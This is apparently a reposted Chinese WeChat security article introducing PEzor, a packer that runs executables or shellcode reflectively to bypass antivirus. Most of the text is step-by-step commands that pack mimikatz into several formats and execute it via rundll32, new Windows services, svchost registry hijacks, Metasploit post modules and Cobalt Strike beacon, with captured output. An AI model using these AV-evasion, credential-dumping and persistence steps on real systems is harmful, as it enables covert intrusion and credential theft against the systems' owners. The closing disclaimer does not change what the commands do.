本文由海阳顶端授权发布 介绍一款很强大的工具, https://github.com/phra/PEzor,主要是用于通过反射来执行exe或shellcode,从而来绕过AV。
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h
export PATH=$PATH:~/go/bin/:/home/kali/PEzor:/home/kali/PEzor/deps/donut_v0.9.3/:/home/kali/PEzor/deps/wclang/_prefix_PEzor_/bin/
# generate
$ PEzor -format=exe mimikatz.exe -z 2 -p '"token::whoami" "exit"'
# execute
C:> .mimikatz.exe.packed.exe
# generate
$ PEzor -format=dll mimikatz.exe -z 2 -p '"token::whoami" "exit"'
# execute
C:> rundll32 .mimikatz.exe.packed.dll,DllMain
# generate
$ PEzor -format=service-exe mimikatz.exe -z 2 -p '"log C:/Users/Public/mimi.out" "coffee" "exit"'
# execute
C:UsersPublic> sc create mimiservice binpath= C:UsersPublicmimikatz.exe.packed.service.exe
[SC] CreateService SUCCESS
C:UsersPublic> sc start mimiservice
SERVICE_NAME : mimiservice
TYPE : 20 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 913
FLAGS : 0x0
# generate
$ PEzor -format=service-dll mimikatz.exe -z 2 -p '"log C:/Users/Public/mimi.out" "coffee" "exit"'
# execute
C:UsersPublic> copy /y mimikatz.packed.exe.service.dll %SystemRoot%System32SvcHostDemo.dll
1 file(s) copied.
C:UsersPublic> sc create SvcHostDemo binpath= ^%SystemRoot^%"System32svchost -k mygroup" type= share start= demand
[SC] CreateService SUCCESS
C:UsersPublic> reg add "HKLMSYSTEMCurrentControlSetservicesSvcHostDemoParameters /v ServiceDll /t REG_EXPAND_SZ /d ^%SystemRoot^%System32SvcHostDemo.dll /f
The operation completed successfully.
C:UsersPublic> reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSvcHost" /v mygroup /t REG_MULTI_SZ /d SvcHostDemo /f
The operation completed successfully.
C:UsersPublic> sc start SvcHostDemo
SERVICE_NAME : SvcHostDemo
TYPE : 30 WIN32
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1823
FLAGS : 0x0
# generate
$ PEzor -format=reflective-dll mimikatz.exe -z 2 -p '"log mimi.out" "coffee" "exit"'
# execute
msf5 > use post/windows/manage/reflective_dll_inject
msf5 post(windows/manage/reflective_dll_inject) > set PATH mimikatz.exe.packed.reflective.dll
msf5 post(windows/manage/reflective_dll_inject) > set WAIT 10
msf5 post(windows/manage/reflective_dll_inject) > run
# generate
$ PEzor -format=dotnet mimikatz.exe -z 2 -p '"log mimi.out" "coffee" "exit"'
# execute
msf5 > use post/windows/manage/execute_dotnet_assembly
msf5 post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE mimikatz.exe.packed.dotnet.exe
msf5 post(windows/manage/execute_dotnet_assembly) > set WAIT 10
msf5 post(windows/manage/execute_dotnet_assembly) > run
# convert and execute reflective DLL
beacon> execute-inmemory -format=reflective-dll mimikatz.exe -z 2 -p '"coffee" "exit"'
# convert and execute .NET assembly
beacon> execute-inmemory -format=dotnet mimikatz.exe -z 2 -p '"coffee" "exit"'
一如既往的学习,一如既往的整理,一如即往的分享。感谢支持
“如侵权请私聊公众号删文”
扫描关注LemonSec
觉得不错点个“赞”、“在看”哦
本文始发于微信公众号(LemonSec):红队的最新一款绕过AV的PE工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论